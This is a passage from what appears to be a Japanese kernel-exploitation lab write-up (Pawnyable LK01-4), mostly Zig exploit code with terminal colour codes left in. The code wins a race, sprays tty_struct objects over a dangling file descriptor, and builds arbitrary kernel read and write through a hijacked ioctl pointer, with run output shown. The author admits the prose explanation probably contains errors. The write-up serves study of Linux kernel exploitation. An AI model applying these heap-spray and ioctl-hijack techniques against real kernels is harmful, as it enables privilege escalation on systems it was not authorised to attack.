�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mDeviceBusy�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mslave_sync�[0m�[1m�[37m.�[0m�[37mset�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmaster_sync�[0m�[1m�[37m.�[0m�[37mwait�[0m�[1m�[37m();�[0m�[1m�[37m �[0m�[33m// sleep and let master resume execution�[0m
�[1m�[37m �[0m�[1m�[37mmaster_sync�[0m�[1m�[37m.�[0m�[37mreset�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mrace�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37massert�[0m�[1m�[37m(�[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mgetCpuCount�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m>�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mslave_sync�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[1m�[37mResetEvent�[0m�[1m�[37m{};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mmaster_sync�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[1m�[37mResetEvent�[0m�[1m�[37m{};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mt1�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mspawn�[0m�[1m�[37m(.{},�[0m�[1m�[37m �[0m�[1m�[37mrace_master�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[36m&�[0m�[1m�[37mslave_sync�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mmaster_sync�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mt2�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mspawn�[0m�[1m�[37m(.{},�[0m�[1m�[37m �[0m�[1m�[37mrace_slave�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[36m&�[0m�[1m�[37mslave_sync�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mmaster_sync�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mt1�[0m�[1m�[37m.�[0m�[37mgetHandle�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mt2�[0m�[1m�[37m.�[0m�[37mgetHandle�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mt1�[0m�[1m�[37m.�[0m�[37mjoin�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mt2�[0m�[1m�[37m.�[0m�[37mjoin�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Won the race"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mmaster_fd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mmaster_fd�[0m�[1m�[37m.�[0m�[1m�[36m?�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m[INFO] Won the race�[0m
複数のコアをヒープスプレーする時には微妙な違いはある。
�[1m以下の説明は多分間違いが含むてる。�[22m
�[40m�[35m`g_buf`�[39m�[49mを解法する時(コア1で)、おそらく�[40m�[35m`g_buf`�[39
m�[49mに居るスラブはコア0またはコア1のいずれかのアクティブスラブ。
何故なら、確保した時点で真っ直ぐに解放したから。
�[40m�[35m`g_buf`�[39m�[49mはコア1に確保した場合、解法するとコア1のアクティブスラブのlock-
freeフリーリスト(それとスラブのフリーリストは別物)。
つまり、�[40m�[35m`g_buf`�[39m�[49mに行った空虚な空間に新しい構造体を確保するてめに、その構造体はコア1
から確保する必要だ。
�[40m�[35m`g_buf`�[39m�[49mはコア0に確保したとコア1に解法した場合、アクティブスラブのフリーリストに追加
する。
コア0に確保するでもコア1に確保するでも、結果は同じだ。[^fn:5], [^fn:6].
要するに、コア0とコア1両方にスプレーするが必要だ。
�[33mfn�[0m�[1m�[37m �[0m�[37mspray�[0m�[1m�[37m(�[0m�[1m�[37mdangling_fd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtty_fd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*?�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mfds�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m100�[0m�[1m�[37m]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mi�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mi�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mj�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfds�[0m�[1m�[37m[�[0m�[1m�[37mj�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mi�[0m�[1m�[37m �[0m�[1m�[36m<�[0m�[1m�[37m �[0m�[1m�[37mfds�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mi�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfds�[0m�[1m�[37m[�[0m�[1m�[37mi�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/ptmx"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDONLY�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mNOCTTY�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// check if dangling_fd point to a tty_struct�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m{�[0m�[1m�[36m0�[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[1m�[36m**�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"magic"�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mdangling_fd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mtty_struct�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdriver�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m �[0m�[1m�[37m})[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m]))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty_fd�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfds�[0m�[1m�[37m[�[0m�[1m�[37mi�[0m�[1m�[37m];�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mgetTty�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m2�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mcpu�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mt�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mspawn�[0m�[1m�[37m(.{},�[0m�[1m�[37m �[0m�[1m�[37mspray�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mret�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mt�[0m�[1m�[37m.�[0m�[37mgetHandle�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mt�[0m�[1m�[37m.�[0m�[37mjoin�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mret�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty_fd�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Heap spray succeeded on core {d}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mcpu�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[37mtty_fd�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37mwarn�[0m�[1m�[37m(�[0m�[33m"Heap spray failed on core {d}, retrying on {d}..."�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mcpu�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[36m+�[0m�[1m�[36m1�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mSprayFailed�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m[INFO] Won the race�[0m
�[1m�[37m[INFO] Heap spray succeeded on core 0�[0m
後はv3と同様に攻撃する。今度は�[40m�[35m`task_struct`�[39m�[49mを書き込めるをやろう。
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk01�[0m�[1m�[36m-�[0m�[1m�[36m4�[0m�[1m�[36m-�[0m�[1m�[37mrace�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk01�[0m�[1m�[36m-�[0m�[1m�[36m4�[0m�[1m�[36m-�[0m�[1m�[37mspray�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mtty_struct�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMOV_ADDROF_RDX_RCX�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff811b72c6�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMOV_EAX_ADDROF_RDX�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff8145e3a8�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37maa_memoize�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?�[0m�[33menum�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37mread�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mwrite�[0m�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37maaw�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mvalue�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddress�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37maa_memoize�[0m�[1m�[37m �[0m�[33morelse�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mread�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mwrite�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mwrite�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mtty_struct�[0m�[1m�[37m.�[0m�[37minit�[0m�[1m�[37m(�[0m�[1m�[37mg_buf_addr�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mtty_operations�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mioctl�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mMOV_ADDROF_RDX_RCX�[0m�[1m�[37m �[0m�[1m�[37m}));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37maa_memoize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mwrite�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mvalue�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddress�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mAAWFail�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37maar�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddress�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mu32�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37maa_memoize�[0m�[1m�[37m �[0m�[33morelse�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mwrite�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mread�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mwrite�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mtty_struct�[0m�[1m�[37m.�[0m�[37minit�[0m�[1m�[37m(�[0m�[1m�[37mg_buf_addr�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mtty_operations�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mioctl�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mMOV_EAX_ADDROF_RDX�[0m�[1m�[37m �[0m�[1m�[37m}));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37maa_memoize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mread�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// we hijack the return value of ioctl, so we can't check it for errors�[0m
